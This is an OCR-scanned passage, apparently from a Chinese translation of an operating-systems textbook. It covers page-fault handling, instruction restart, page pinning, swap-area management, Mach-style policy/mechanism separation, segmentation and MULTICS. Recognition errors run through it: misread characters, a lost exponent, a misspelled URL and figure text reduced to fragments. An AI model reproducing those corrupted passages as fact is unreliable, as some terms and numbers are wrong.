以 节省 磁盘 空间 和 初始 化 时 间 。 最 后 ， 操 作 系 统 必 须 把 有 关 页 表 和 磁盘 交换 区 的 信息 存储 在 进程 表 中 。 

当 调度 一 个 进程 执行 时 ， 必 须 为 新 进程 重 置 MMU ， 刷 新 TLB ， 以 清除 以 前 的 进程 遗留 的 痕迹 。 新 
进程 的 页 表 必 须 成 为 当前 页 表 ， 通 常 可 以 通过 复制 该 页 表 或 者 把 一 个 指向 它 的 指针 放 进 某 个 硬件 寄存 器 
来 完成 。 有 时 ， 在 进程 初始 化 时 可 以 把 进程 的 部 分 或 者 全 部 页 面 装 入 内 存 中 以 减少 缺 页 中 断 的 发 生 ， 例 
如 ，PC (程序 计数 器 ) 所 指 的 页 面 肯定 是 需要 的 。 

当 缺 页 中 断 发 生 时 ， 操 作 系 统 必须 通过 读 硬件 寄存 器 来 确定 是 哪个 虚拟 地 址 造成 了 缺 页 中 断 。 通 过 
该 信息 ， 它 要 计算 需要 哪个 页 面 ， 并 在 磁盘 上 对 该 页 面 进行 定位 。 它 必须 找到 合适 的 页 框 来 存放 新 页 面 ， 
必要 时 还 要 置换 老 的 页 面 ， 然 后 把 所 需 的 页 面 读 和 页 框 。 最 后 ， 还 要 回 退 程序 计数 器 ， 使 程序 计数 器 指 
向 引起 缺 页 中 断 的 指令 ， 并 重新 执行 该 指令 。 

当 进 程 退 出 的 时 候 ， 操 作 系 统 必须 释放 进程 的 页 表 、 页 面 和 页 面 在 硬盘 上 所 占用 的 空间 。 如 果菜 些 
页 面 是 与 其 他 进程 共享 的 ， 当 最 后 一 个 使 用 它们 的 进程 终止 的 时 候 ， 才 可 以 释放 内 存 和 磁盘 上 的 页 面 。 


3.6.2 缺 页 中 断 处 理 

现在 终于 可 以 讨论 缺 页 中 断 发 生 的 细节 了 。 缺 页 中 断 发 生 时 的 事件 顺序 如 下 : 

1) 硬件 陷入 内 核 ， 在 堆栈 中 保存 程序 计数 器 。 大 多 数 机 器 将 当前 指令 的 各 种 状态 信息 保存 在 特殊 的 
CPU 寄存 器 中 。 

2) 启动 一 个 汇编 代码 例 程 保存 通用 寄存 器 和 其 他 易 失 的 信息 ， 以 免 被 操作 系统 破坏 。 这 个 例 程 将 操 
作 系统 作为 一 个 函数 来 调用 。 

3) 当 操 作 系 统 发 现 一 个 缺 页 中 断 时 ， 尝 试 发 现 需要 哪个 虚拟 页 面 。 通 常 一 个 硬件 寄存 器 包含 了 这 一 
信息 ， 如 果 没 有 的 话 ， 操 作 系统 必须 检索 程序 计数 器 ， 取 出 这 条 指令 ， 用 软件 分 析 这 条 指令 ， 看 看 它 在 
缺 页 中 断 时 正在 做 什么 。 

4) 一 旦 知道 了 发 生 缺 页 中 断 的 虚拟 地 址 ， 操 作 系 统 检查 这 个 地 址 是 否 有 效 ， 并 检查 存 取 与 保护 是 否 
一 致 。 如 果 不 一 致 ， 向 进程 发 出 一 个 信号 或 杀 掉 该 进程 。 如 果 地 址 有 效 且 没有 保护 错误 发 生 ， 系 统 则 检 
查 是 否 有 空闲 页 框 。 如 果 没 有 空闲 页 框 ， 执 行 页 面 置换 算法 寻找 一 个 页 面 来 淘汰 。 

5) 如 果 选 择 的 页 框 “ 胜 ”了 ， 安 排 该 页 写 回 磁盘 ， 并 发 生 一 次 上 下 文 切 换 ， 挂 起 产生 缺 页 中 断 的 进 
程 ， 让 其 他 进程 运行 直至 磁盘 传输 结束 。 无 论 如 何 ， 该 页 框 被 标记 为 已 ， 以 免 因为 其 他 原因 而 被 其 他 进 
程 占用 。 

6) 一 旦 页 框 “ 干 净 ” 后 (无 论 是 立刻 还 是 在 写 回 磁盘 后 ) ， 操 作 系 统 查找 所 需 页 面 在 磁盘 上 的 地 址 ， 
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通过 磁盘 操作 将 其 装 入。 该 页 面 正在 被 装 入 时 ， 产 生 缺 页 中 断 的 进程 仍然 被 挂 起 ， 并 且 如 果 有 其 他 可 运 
行 的 用 户 进程 ， 则 选择 另 一 个 用 户 进 程 运 行 。 

7) 当 磁 盘 中 断 发 生 时 ， 表 明 该 页 已 经 被 装 入 ， 页 表 已 经 更 新 可 以 反映 它 的 位 置 ， 页 框 也 被 标记 为 正 
常 状态 。 

8) 恢复 发 生 缺 页 中 断 指令 以 前 的 状态 ， 程 序 计数 器 重新 指向 这 条 指令 。 

9) 调度 引发 缺 页 中 断 的 进程 ， 操 作 系统 返回 调用 它 的 汇编 语言 例 程 。 

10) 该 例 程 恢复 寄存 器 和 其 他 状态 信息 ， 返 回 到 用 户 空间 继续 执行 ， 就 好 像 缺 页 中 断 没有 发 生 过 一 样 。 


3.6.3 指令 备份 

当 程序 访问 不 在 内 存 中 的 页 面 时 ， 引 起 缺 页 中 断 的 指令 会 半途 停止 并 引发 操作 系统 的 陷阱 。 在 操作 
系统 取出 所 需 的 页 面 后 ， 它 需要 重新 启动 引起 陷阱 的 指令 。 但 这 并 不 是 一 件 容易 实现 的 事 。 

在 最 坏 情 形 下 考察 这 个 问题 的 实质 ， 考 虑 一 个 有 双 地 址 


指令 的 CPU ， 比 如 Motorola 680x0， 这 是 一 种 在 嵌入 式 系统 MOVE.L #6(A1), 2(A0) 
中 广泛 使 用 的 CPU。 例 如 ， 指 令 pi t m 
MOVE.L#6(A1), 2(A0) 1000 [MOVE Žž [jerm 


,  1o2{ 6 省 第 ! 个 操作 数 
为 6 字 节 〈 见 图 3-27)。 为 了 重启 该 指令 ， 操 作 系统 要 知道 该 1o04| ”2 ||} 第 2 个 操作 数 


指令 第 一 个 字 节 的 位 置 。 在 陷阱 发 生 时 ， 程 序 计数 器 的 什 
依赖 于 引起 缺 页 中 断 的 那个 操作 数 以 及 CPU 中 微 指令 的 实 。 图 3-27 引起 缺 页 中 上 断 的 一 条 指令 
现 方式 。 

在 图 3-27 中 ， 从 地 址 1000 处 开始 的 指令 进行 了 3 次 内 存 访问 :指令 字 本 身 和 操作 数 的 2 个 偏 移 量 。 从 
可 以 产生 缺 页 中 断 的 这 3 次 内 存 访问 来 看 ， 程 序 计数 器 可 能 在 1000、1002 和 1004 时 发 生 缺 页 中 断 ， 对 操 
作 系统 来 说 要 准确 地 判断 指令 是 从 哪儿 开始 的 通常 是 不 可 能 的 。 如 果 发 生 缺 页 中 断 时 程序 计数 器 是 1002， 
操作 系统 无 法 弄 清 在 1002 位 置 的 字 是 与 1000 的 指令 有 关 的 内 存 地 址 (比如 ， 一 个 操作 数 的 位 置 )， 还 是 
一 个 操作 码 。 

这 种 情况 已 经 很 糟糕 了 ， 但 可 能 还 有 更 精 的 情况 。 一 些 680x0 体 系 结构 的 寻 址 方式 采用 自动 增 量 ， 
这 也 意味 着 执行 这 条 指令 的 副作用 是 会 增 量 一 个 或 多 个 寄存 器 。 使 用 自动 增 量 模式 也 可 能 引起 错误 。 这 
依赖 于 微 指令 的 具体 实现 ， 这 种 增 量 可 能 会 在 内 存 访问 之 前 完成 ， 此 时 操作 系统 必须 在 重启 这 条 指令 前 
将 软件 中 的 寄存 器 碱 量 。 自 动 增 量 也 可 能 在 内 存 访问 之 后 完成 ， 此 时 ， 它 不 会 在 陷入 时 完成 而 且 不 必 由 
操作 系统 恢复 。 自 动 减 量 也 会 出 现 相同 的 问题 。 自 动 增 量 和 自动 减 量 是 否 在 相应 访 存 之 前 完成 随 着 指令 
和 CPU 模式 的 不 同 而 不 同 。 

幸运 的 是 ， 在 某 些 计算 机 上 ，CPU 的 设计 者 们 提供 了 一 种 解决 方法 ， 就 是 通过 使 用 一 个 隐藏 的 内 部 
寄存 器 。 在 每 条 指令 执行 之 前 ， 把 程序 计数 器 的 内 容 复制 到 该 寄存 器 。 这 些 机 器 可 能 会 有 第 二 个 寄存 器 ， 
用 来 提供 哪些 寄存 器 已 经 自动 增加 或 者 自动 减少 以 及 增 减 的 数量 等 信息 。 通 过 这 些 信息 ， 操 作 系统 可 以 
消除 引起 缺 页 中 断 的 指令 所 造成 的 所 有 影响 ， 并 使 指令 可 以 重新 开始 执行 。 如 果 该 信息 不 可 用 ， 那 么 操 
作 系统 就 要 找 出 所 发 生 的 问题 从 而 设法 来 修复 它 。 看 起 来 硬件 设计 者 是 不 能 解决 这 个 问题 了 ， 于 是 他 们 
就 推 给 操作 系统 的 设计 者 来 解决 这 个 问题 。 


3.6.4 锁定 内 存 中 的 页 面 

尽管 本 章 对 IO 的 讨论 不 多 ， 但 计算 机 有 虚拟 内 存 并 不 意味 着 IO 不 起 作用 了 。 虚 拟 内 存 和 IO 通过 微 
妙 的 方式 相互 作用 着 。 设 想 一 个 进程 刚刚 通过 系统 调用 从 文件 或 其 他 设备 中 读 取 数 据 到 其 地 址 空间 中 的 
缓冲 区 。 在 等 待 JO 完 成 时 ， 该 进程 被 挂 起 ， 另 一 个 进程 被 允许 运行 ， 而 这 个 进程 产生 一 个 缺 页 中 断 。 

如 果 分 页 算法 是 全 局 算法 ， 包 含 1O 缓 冲 区 的 页 面 会 有 很 小 的 机 会 (但 不 是 没有 ) 被 选中 换 出 内 存 。 
如 果 一 个 IO 设备 正 处 在 对 该 页 面 进行 DMA 传 输 的 过 程 之 中 ， 将 这 个 页 面 移出 将 会 导致 部 分 数据 写 人 它 
们 所 属 的 缓冲 区 中 ， 而 部 分 数据 被 写 人 到 最 新 装 入 的 页 面 中 。 一 种 解决 方法 是 锁 住 正 在 做 IO 操作 的 内 
存 中 的 页 面 以 保证 它 不 会 被 移出 内 存 。 锁 住 一 个 页 面 通常 称 为 在 内 存 中 钉 住 (pining) 页 面 。 另 一 种 方 
法 是 在 内 核 缓冲 区 中 完成 所 有 的 IO 操作 ， 然 后 再 将 数据 复制 到 用 户 页 面 。 
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3.6.5 后 备 存储 

在 前 面 讨 论 过 的 页 面 置换 算法 中 ， 我 们 已 经 知道 了 如 何 选择 换 出 内 存 的 页 面 。 但 是 却 没 有 讨论 当 页 
面 被 换 出 时 会 存放 在 磁盘 上 的 哪个 位 置 ， 现 在 我 们 讨论 一 下 磁盘 管理 相关 的 问题 。 

在 磁盘 上 分 配 页 面 空间 的 最 简单 的 算法 是 在 磁盘 上 设置 特殊 的 交换 分 区 ， 甚 至 从 文件 系统 划分 一 块 
独立 的 磁盘 〈 以 平衡 IO 负载 )。 大 多 数 UNIX 是 这 样 处 理 的 。 在 这 个 分 区 里 没有 普通 的 文件 系统 ， 这 样 
就 消除 了 将 文件 偏 移 转换 成 块 地 址 的 开销 。 取 而 代 之 的 是 ， 始 终 使 用 相应 分 区 的 起 始 块 号 。 

当 系 统 启动 时 ,该 交换 分 区 为 空 , 并 在 内 存 中 以 单独 的 项 给 出 它 的 起 始 和 大 小 。 在 最 简单 的 情况 下 ， 
当 第 一 个 进程 启动 时 ， 留 出 与 这 个 进程 一 样 大 的 交换 区 块 ， 剩 余 的 为 总 空间 减 去 这 个 交换 分 区 。 当 新 进 
程 启动 后 ， 它 们 同样 被 分 配 与 其 核心 映像 同等 大 小 的 交换 分 区 。 进 程 结束 后 ， 会 释放 其 磁盘 上 的 交换 区 。 
交换 分 区 以 空闲 块 列表 的 形式 组 织 。 更 好 的 算法 在 第 10 章 里 讨论 。 

与 每 个 进程 对 应 的 是 其 交换 区 的 磁盘 地 址 ， 即 进程 映像 所 保存 的 地 方 。 这 一 信息 是 记录 在 进程 表 里 
的 。 写 回 一 个 页 面 时 ， 计 算 写 回 地 址 的 过 程 很 简单 : 将 虚拟 地 址 空间 中 页 面 的 偏 移 量 加 到 交换 区 的 开始 
地 址 。 但 在 进程 启动 前 必须 初始 化 交换 区 ， 一 种 方法 是 将 整个 进程 映像 复制 到 交换 区 ， 以 便 随 时 可 将 所 
需 内 容 装 入 ， 另 一 种 方法 是 将 整个 进程 装 和 内存， 并 在 需要 时 换 出 。 

但 这 种 简单 模式 有 一 个 问题 : 进程 在 启动 后 可 能 增 大 ， 尽 管 程序 正文 通常 是 固定 的 ， 但 数据 有 时 会 
增长 ， 堆 栈 也 总 是 在 随时 增长 。 这 样 ， 最 好 为 正文 、 数 据 和 堆栈 分 别 保留 交换 区 ， 并 且 允 许 这 些 交换 区 
在 磁盘 上 多 于 一 个 块 。 

男 一 个 极端 的 情况 是 事先 什么 也 不 分 配 ， 在 页 面 换 出 时 为 其 分 配 磁盘 空间 ， 并 在 换 入 时 回收 磁盘 空 
间 ， 这 样 内 存 中 的 进程 不 必 固定 于 任何 交换 空间 。 其 缺点 是 内 存 中 每 个 页 面 都 要 记录 相应 的 磁盘 地 址 。 
换言之 ， 每 个 进程 都 必须 有 一 张 表 ， 记 录 每 一 个 页 面 在 磁盘 上 的 位 置 。 这 两 个 方案 如 图 3-28 所 示 。 





图 3-28 a) 对 静态 交换 区 分 页 ，b) 动态 备份 页 面 


在 图 3-28a 中 ， 有 一 个 带 有 8 个 页 面 的 页 表 。 页 面 0、3、4 和 6 在 内 存 中 。 页 面 1、2、5 和 7 在 磁盘 上 。 
磁盘 上 的 交换 区 与 进程 虚拟 地 址 空间 (8 页 面 ) 一 样 大 ， 每 个 页 面 有 固定 的 位 置 ， 当 它 从 内 存 中 被 淘汰 
时 ， 便 写 到 相应 位 置 。 该 地 址 的 计算 需要 知道 进程 的 分 页 区 域 的 起 始 位 置 ， 因 为 页 面 是 按照 它们 的 虚拟 
页 号 的 顺序 连续 存储 的 。 内 存 中 的 页 面 通常 在 磁盘 上 有 镜像 副本 ， 但 是 如 果 页 面 装 和 后 被 修改 过 ， 那 么 
这 个 副本 就 可 能 是 过 期 的 了 。 内 存 中 的 深 色 页 面 表示 不 在 内 存 ， 磁 盘 上 的 深 色 页 面 (原则 上 ) 被 内 存 中 
的 副本 所 替代 ， 但 如 果 有 一 个 内 存 页 面 要 被 换 回 磁盘 并 且 该 页 面 在 装 和 内存 后 没有 被 修改 过 ， 那 么 将 使 
用 磁盘 中 ( 深 色 ) 的 副本 。 

在 图 3-28b 中 ， 页 面 在 磁盘 上 没有 固定 地 址 。 当 页 面 换 出 时 ， 要 及 时 选择 一 个 空 磁盘 页 面 并 据 此 来 
更 新 磁盘 映射 (每 个 虚拟 页 面 都 有 一 个 磁盘 地 址 空间 ) 。 内 存 中 的 页 面 在 磁盘 上 没有 副本 。 它 们 在 磁盘 
映射 表 中 的 表 项 包含 一 个 非法 的 磁盘 地 址 或 者 一 个 表示 它们 未 被 使 用 的 标记 位 。 

不 能 保证 总 能 够 实现 固定 的 交换 分 区 。 例 如 ， 没 有 磁盘 分 区 可 用 时 。 在 这 种 情况 下 ， 可 以 利用 正常 
文件 系统 中 的 一 个 或 多 个 较 大 的 、 事 前 定位 的 文件 。Windows 就 使 用 这 个 方法 。 然 而 ， 可 以 利用 优化 方 
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法 减少 所 需 的 磁盘 空间 量 。 既 然 每 个 进程 的 程序 正文 来 自 文件 系统 中 某 个 (可 执行 的 ) 文件 ， 这 个 可 执 
行文 件 就 可 用 作 交 换 区 。 而 更 好 的 方法 是 ， 由 于 程序 正文 通常 是 只 读 的 ， 当 内 存 资源 紧张 、 程 序 页 不 得 
不 移出 内 存 时 ， 尽 管 丢弃 它们 ， 在 需要 的 时 候 再 从 可 执行 文件 读 入 即 可 。 共 享 库 也 可 以 用 这 个 方式 工作 。 


3.6.6 策略 和 机 制 的 分 离 

控制 系统 复杂 度 的 一 种 重要 方法 就 是 把 策略 从 机 制 中 分 离 出 来 。 通 过 使 大 多 数 存 储 管理 器 作为 用 户 
级 进程 运行 ， 就 可 以 把 该 原则 应 用 到 存储 管理 中 。 在 Mach (Young 等 人 ，1987) 中 首先 应 用 了 这 种 分 
离 。 下 面 的 讨论 是 基于 Mach 的 。 

一 个 如 何 分 离 策 略 和 机 制 的 简单 例子 可 以 参见 图 3-29。 其 中 存储 管理 系统 被 分 为 三 个 部 分 : 

1) 一 个 底层 MMU 处 理 程序 。 

2) 一 个 作为 内 核 一 部 分 的 缺 页 中 
断 处 理 程序 。 

3) 一 个 运行 在 用 户 空 间 中 的 外 部 
页 面 调度 程序 。 

所 有 关于 MMU 工 作 的 细节 都 被 封 
装 在 MMU 处 理 程序 中 ， 该 程序 的 代码 
是 与 机 器 相关 的 ， 而 且 操作 系统 每 应 
用 到 一 个 新 平台 就 要 被 重 写 一 次 。 缺 
页 中 断 处 理 程 序 是 与 机 器 无 关 的 代码 ， 
包含 大 多 数 分 页 机 制 。 策 略 主要 由 作 
为 用 户 进程 运行 的 外 部 页 面 调度 程序 图 3-29 用 一 个 外 部 页 面 调度 程序 来 处 理 缺 页 中 断 
所 决定 。 

当 一 个 进程 启动 时 ， 需 要 通知 外 部 页 面 调度 程序 以 便 建立 进程 页 面 映射 如果 需要 的 话 还 要 在 磁盘 
上 分 配 后 备 存储 。 当 进程 正在 运行 时 ， 它 可 能 要 把 新 对 象 映射 到 它 的 地 址 空间 ， 所 以 还 要 再 一 次 通知 外 
部 页 面 调度 程序 。 

一 旦 进程 开始 运行 ， 就 有 可 能 出 现 缺 页 中 断 。 缺 页 中 断 处 理 程序 找 出 需要 哪个 虚拟 页 面 ， 并 发 送 一 
条 消息 给 外 部 页 面 调度 程序 告诉 它 发 生 了 什么 问题 。 外 部 页 面 调度 程序 从 磁盘 中 读 人 所 需 的 页 面 ， 把 它 
复制 到 自己 的 地 址 空间 的 某 一 位 置 。 然 后 告诉 缺 页 中 断 处 理 程序 该 页 面 的 位 置 。 缺 页 中 断 处 理 程序 从 外 
部 页 面 调 度 程 序 的 地 址 空间 中 清除 该 页 面 的 映射 ， 然 后 请 求 MMU 处 理 程 序 把 它 放 到 用 户 地 址 空间 的 正 
确 位 置 ， 随 后 就 可 以 重新 启动 用 户 进程 了 。 

这 个 实现 方案 没有 给 出 放置 页 面 置换 算法 的 位 置 。 把 它 放 在 外 部 页 面 调度 程序 中 比较 简单 ， 但 会 有 
一 些 问 题 。 这 里 有 一 条 原则 就 是 外 部 页 面 调 度 程 序 无 权 访问 所 有 页 面 的 R 位 和 M 人 位。 这些 二 进 制 位 在 许 
多 页 面 置换 算法 起 重要 作用 。 这 样 就 需要 有 某 种 机 制 把 该 信息 传递 给 外 部 页 面 调度 程序 ， 或 者 把 页 面 置 
换算 法 放 到 内 核 中 。 在 后 一 种 情况 下 ， 人 缺 页 中 断 处 理 程序 会 告诉 外 部 页 面 调度 程序 它 所 选择 的 要 淘汰 的 
页 面 并 提供 数据 ， 方 法 是 把 数据 映射 到 外 部 页 面 调 度 程序 的 地 址 空间 中 或 者 把 它 包含 到 一 条 消息 中 。 两 
种 方法 中 ， 外 部 页 面 调度 程序 都 把 数据 写 到 磁盘 上 。 

这 种 实现 的 主要 优势 是 有 更 多 的 模块 化 代码 和 更 好 的 适应 性 。 主 要 缺点 是 由 于 多 次 交叉 “用 户 一 内 
核 ” 边界 引起 的 额外 开销 ， 以 及 系统 模块 间 消息 传递 所 造成 的 额外 开销 。 现 在 看 来 ， 这 一 主题 有 很 多 争 
议 ， 但 是 随 着 计算 机 越 来 越 快 ， 软 件 越 来 越 复杂 ， 从 长 远 来 看 ， 对 于 大 多 数 实现 ， 为 了 获得 更 高 的 可 靠 
性 而 牺牲 一 些 性 能 也 是 可 以 接受 的 。 


3.7 分 段 

到 目前 为 止 讨 论 的 虚拟 内 存 都 是 一 维 的 ， 虚 拟 地 址 从 0 到 最 大 地 址 ， 一 个 地 址 接着 另 一 个 地 址 。 对 
许多 问题 来 说 ， 有 两 个 或 多 个 独立 的 地 址 空间 可 能 比 只 有 一 个 要 好 得 多 。 比 如 ， 一 个 编译 器 在 编译 过 程 
中 会 建立 许多 表 ， 其 中 可 能 包括 : 

1) 被 保存 起 来 供 打 印 清单 用 的 源 程序 正文 (用 于 批 处 理 系 统 )。 

2) 符号 表 ， 包 含 变量 的 名 字 和 属性 。 
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3) 包含 用 到 的 所 有 整 型 量 和 浮 点 常量 的 表 。 

4) 语法 分 析 树 ， 包 含 程序 语法 分 析 的 结果 。 ” 虚拟 地 址 空间 

5) 编译 器 内 部 过 程 调用 使 用 的 堆栈 。 

前 4 个 表 随 着 编译 的 进行 不 断 地 增长 ， 最 后 一 个 表 
在 编译 过 程 中 以 一 种 不 可 预计 的 方式 增长 和 缩小 。 在 一 





维 存 入 器 中 ， 这 个 才 只 能 被 分 配 到 虚拟 地 址 空间 中 连续 } s 
的 块 中 ， 如 图 3-31 所 示 。 峙 的 地 空间 | 语法 分 析 树 [aes 
考虑 一 下 如 果 一 个 程序 中 变量 的 数量 要 远 比 其 他 部 的 空间 
分 的 数量 多 时 的 情况 。 地 址 空间 中 分 给 符号 表 的 块 可 能 
会 被 装 满 ， 但 这 时 其 他 表 中 还 有 大 量 的 空间 。 常量 表 
所 需要 的 是 一 种 能 令 程序 员 不 用 管理 表 扩张 和 收 
缩 的 方法 ， 这 与 虚拟 内 存 解决 程序 段 覆盖 问题 所 用 的 广 
法 相同 。 源 程序 正文 
一 个 直观 并 且 通 用 的 方法 是 在 机 器 上 提供 多 个 互相 | 
独立 的 称 为 段 (segment) 的 地 址 空间 。 每 个 段 由 一 个 从 序 正文 表 


0 到 最 大 的 线性 地 址 序列 构成 。 各 个 段 的 长 度 可 以 是 0 到 图 330 在 一 维 地址 空间 中 ， 当 有 多 个 动态 增加 的 
某 个 允许 的 最 大 值 之 间 的 任何 一 个 值 。 不 同 的 段 的 长 度 表 时 ， 一 个 表 可 能 会 与 另 一 个 表 发 生 碰撞 
可 以 不 同 ， 并且 通 常情 况 下 也 都 不 相同 。 段 的 长 度 在 运 
行 期 间 可 以 动态 改变 ， 比 如 ， 堆 栈 段 的 长 度 在 数据 被 压 和 人 时 会 增长 ， 在 数据 被 弹出 时 又 会 减 小 。 

因为 每 个 段 都 构成 了 一 个 独立 的 地 址 空间 , 所 以 它们 可 以 独立 地 增长 或 减 小 而 不 会 影响 到 其 他 的 段 。 
如 果 一 个 在 某 个 段 中 的 堆栈 需要 更 多 的 空间 ， 它 就 可 以 立刻 得 到 所 需要 的 空间 ， 因 为 它 的 地 址 空间 中 没 
有 任何 其 他 东西 阻挡 它 增长 。 段 当然 有 可 能 会 被 装 满 ， 但 通常 情况 下 段 都 很 大 ， 因 此 这 种 情况 发 生 的 可 
能 性 很 小 。 要 在 这 种 分 段 或 二 维 的 存储 器 中 指示 一 个 地 址 ， 程 序 必 须 提供 两 部 分 地 址 ， 一 个 段 号 和 一 个 
段 内 地 址 。 图 3-31 给 出 了 前 面 讨论 过 的 编译 表 的 分 段 内 存 ， 其 中 共有 5 个 独立 的 段 。 


20K 
16K 16K 


12K 12K 12K 12K 


符号 表 
8K 8K 8K 上 上 语法 8K 
源 程序 分 析 树 调用 
4K alL 正文 4K 4K 上 堆栈 
OK OK OK OK OK 
B Be 段 Be 段 
0 1 2 3 4 


图 3-31 分 段 存储 管理 ， 每 一 个 段 都 可 以 独立 地 增 大 或 减 小 而 不 会 影响 其 他 的 自 


需要 强调 的 是 ， 自 是 一 个 逻辑 实体 ， 程 序 员 知 道 这 一 点 并 把 它 作为 一 个 逻辑 实体 来 使 用 。 一 个 段 可 
能 包括 一 个 过 程 、 一 个 数组 、 一 个 堆栈 、 一 组 数值 变量 ， 但 一 般 它 不 会 同时 包含 多 种 不 同类 型 的 内 容 。 

除了 能 简化 对 长 度 经 常 变动 的 数据 结构 的 管理 之 外 ， 分 段 存储 管理 还 有 其 他 一 些 优 点 。 如 果 每 个 过 
程 都 位 于 一 个 独立 的 段 中 并 且 起 始 地 址 是 0， 那 么 把 单独 编译 好 的 过 程 链接 起 来 的 操作 就 可 以 得 到 很 大 
的 简化 。 当 组 成 一 个 程序 的 所 有 过 程 都 被 编译 和 链接 好 以 后 ， 一 个 对 段 " 中 过 程 的 调用 将 使 用 由 两 个 部 
分 组 成 的 地 址 (n, 0) 来 寻 址 到 字 0 (AA). 

如 果 随 后 位 于 段 n 的 过 程 被 修改 并 被 重新 编译 ， 即 使 新 版 本 的 程序 比 老 的 要 大 ， 也 不 需要 对 其 他 的 
过 程 进行 修改 (因为 没有 修改 它们 的 起 始 地 址 )。 在 一 维 地 址 中 ， 过 程 被 一 个 挨 一 个 紧 紧 地 放 在 一 起 ， 
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中 间 没 有 空隙 ， 因 此 修改 一 个 过 程 的 大 小 会 影响 其 他 无 关 的 过 程 的 起 始 地 址 ， 而 这 又 需要 修改 调用 了 这 
些 被 移动 过 的 过 程 的 所 有 过 程 ， 以 使 它们 的 访问 指向 这 些 过 程 的 新 地 址 。 在 一 个 有 数 百 个 过 程 的 程序 中 ， 
这 个 操作 的 开销 可 能 是 相当 大 的 。 

分 段 也 有 助 于 在 几 个 进程 之 间 共 享 过 程 和 数据 。 这 方面 一 个 常见 的 例子 就 是 共享 库 (shared library) 。 
运行 高 级 窗口 系统 的 现代 工作 站 经 常 要 把 非常 大 的 图 形 库 编译 进 几乎 所 有 的 程序 中 。 在 分 段 系 统 中 ， 可 以 
把 图 形 库 放 到 一 个 单独 的 段 中 由 各 个 进程 共享 ， 从 而 不 再 需要 在 每 个 进程 的 地 址 空间 中 都 保存 一 份 。 虽 然 
在 纯 的 分 页 系统 中 也 可 以 有 共享 库 ， 但 是 它 要 复杂 得 多 ， 并 且 这 些 系统 实际 上 是 通过 模拟 分 段 来 实现 的 。 

因为 每 个 段 是 一 个 为 程序 员 所 知道 的 逻辑 实体 ， 比 如 一 个 过 程 或 一 个 数组 ， 故 不 同 的 段 可 以 有 不 同 
种 类 的 保护 。 一 个 过 程 段 可 以 被 指明 为 只 允许 执行 ， 从 而 禁止 对 它 的 读 出 和 写 入 ;一 个 浮 点 数组 可 以 被 
指明 为 允许 读 写 但 不 允许 执行 ， 任 何 试图 向 这 个 段 内 的 跳 转 都 将 被 截获 。 这 样 的 保护 有 助 于 找到 编程 错 
误 ， 图 3-32 对 分 段 和 分 页 进行 了 比较 。 


考查 点 


ri 
存在 多 少 线性 地 址 空间 ? 


分 页 分 段 
l x a ror 
/ | 
整个 地 址 空间 可 以 超出 物理 存储 器 
的 大 小 吗 ? 
a | 













吗 
IK 
EET ETON: 


其 大 小 浮动 的 表 可 以 很 容易 提供 吗 ? 
用 户 间 过 程 的 共享 方便 吗 ? 


为 了 得 到 大 的 线 | 为 了 使 程序 和 数据 可 
为 什么 发 明 这 种 技术 ? 性 地 址 空间 而 不 | 以 被 划分 为 逻辑 上 独 
必 购买 更 大 的 物 | 立 的 地 址 空间 并 且 有 
理 存储 器 助 于 共享 和 保护 





图 3-32 分 页 与 分 段 的 比较 


3.7.1 纯 分 段 的 实现 

分 段 和 分 页 的 实现 本 质 上 是 不 同 的 : 页 面 是 定 长 的 而 段 不 是 。 图 3-33a 所 示 的 物理 内 存在 初始 时 包 
含 了 5 个 段 。 现 在 让 我 们 考虑 当 段 1 被 淘汰 后 ， 比 它 小 的 段 7 放 进 它 的 位 置 时 会 发 生 什么 样 的 情况 。 这 时 
的 内 存 配置 如 图 3-33b 所 示 ， 在 段 7 与 段 2 之 间 是 一 个 未 用 区 域 ， 即 一 个 空间 区 。 随 后 段 4 被 段 5 代替 ， 如 
图 3-33c 所 示 ， 段 3 被 段 6 代替 ， 如 图 3-33d 所 示 。 在 系统 运行 一 段 时间 后 内 存 被 划分 为 许多 块 ， 一 些 块 包 
含 着 段 ， 一 些 则 成 了 空间 区 ， 这 种 现象 称 为 棋盘 形 碎片 或 外 部 碎片 (external fragmentation) 。 空 闲 区 的 
存在 使 内 存 被 浪费 了 ， 而 这 可 以 通过 内 存 紧缩 来 解决 ， 如 图 3-33e 所 示 。 


3.7.2 分 段 和 分 页 结合 : MULTICS 
如 果 一 个 段 比 较 大 ， 把 它 整个 保存 在 内 存 中 可 能 很 不 方便 甚至 是 不 可 能 的 ， 因 此 产生 了 对 它 进行 分 页 
的 想法 。 这 样 ， 只 有 那些 真正 需要 的 页 面 才 会 被 调和 内存。 有 几 个 著名 的 系统 实现 了 对 段 的 分 页 支持 ， 本 节 
将 介绍 第 一 个 实现 了 这 种 支持 的 系统 一 一 MULTICS。 下 一 节 将 介绍 一 个 更 新 的 例子 一 一 Intel x86 到 x86-64。 
MULIICS 是 有 史 以 来 最 具 影响 力 的 操作 系统 之 一 ， 对 UNIX 系 统 、x86 存 储 器 体系 结构 、 快 表 以 及 云 计 
算 均 有 过 深刻 的 影响 。MULIICS 始 于 麻 省 理工 学 院 的 一 个 研究 项 目 ， 并 在 1969 年 上 线 。 最 后 一 个 MULTICS 
系统 在 运行 了 31 年 后 于 2000 年 关闭 。 几 乎 没有 其 他 的 操作 系统 能 像 MULTICS 一 样 几乎 没有 修改 地 持续 运行 
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了 那么 长 时 间 。 尽 管 Windows 操 作 系统 也 存在 了 近 30 年 ， 但 Windows 8 除了 在 名 字 和 所 属 公司 上 和 Windows 
1.0 版 本 相同 外 ， 其 他 方面 没有 任何 共同 点 。 更 重要 的 是 基于 MULTICS 系 统 形成 的 观点 和 理论 在 现在 仍 同 
1965 年 第 一 篇 相关 论文 (Corbat6 和 Vyssotsky，1965) 发 表 时 产生 的 效用 是 一 样 的 。 因 此 ， 我 们 花 些 时 间 来 看 一 下 
MULTICS 系 统 最 具 创新 性 的 一 面 ， 虚 拟 存储 架构 。 有 关 MULTICS 的 更 多 信息 请 访问 www.maulticians.org。 





图 3-33 a)~d) 棋 盘 形 碎片 的 形成 ，e) 通 过 紧缩 消除 棋盘 形 碎 片 


MULTICS 运 行 在 Honeywell 6000 计 算 
机 和 它 的 一 些 后 继 机 型 上 。 它 为 每 个 程序 
提供 了 最 多 2" 个 段 ， 每 个 段 的 虚拟 地 址 空 
间 最 长 为 65 536 个 (36 位 ) 字 长 。 为 了 实 
现 它 ，MULTICS 的 设计 者 决定 把 每 个 段 
都 看 作 一 个 虚拟 内 存 并 对 它 进行 分 页 ， 以 
结合 分 页 的 优点 (统一 的 页 面 大 小 和 在 只 
使 用 段 的 一 部 分 时 不 用 把 它 全 部 调 入 内 
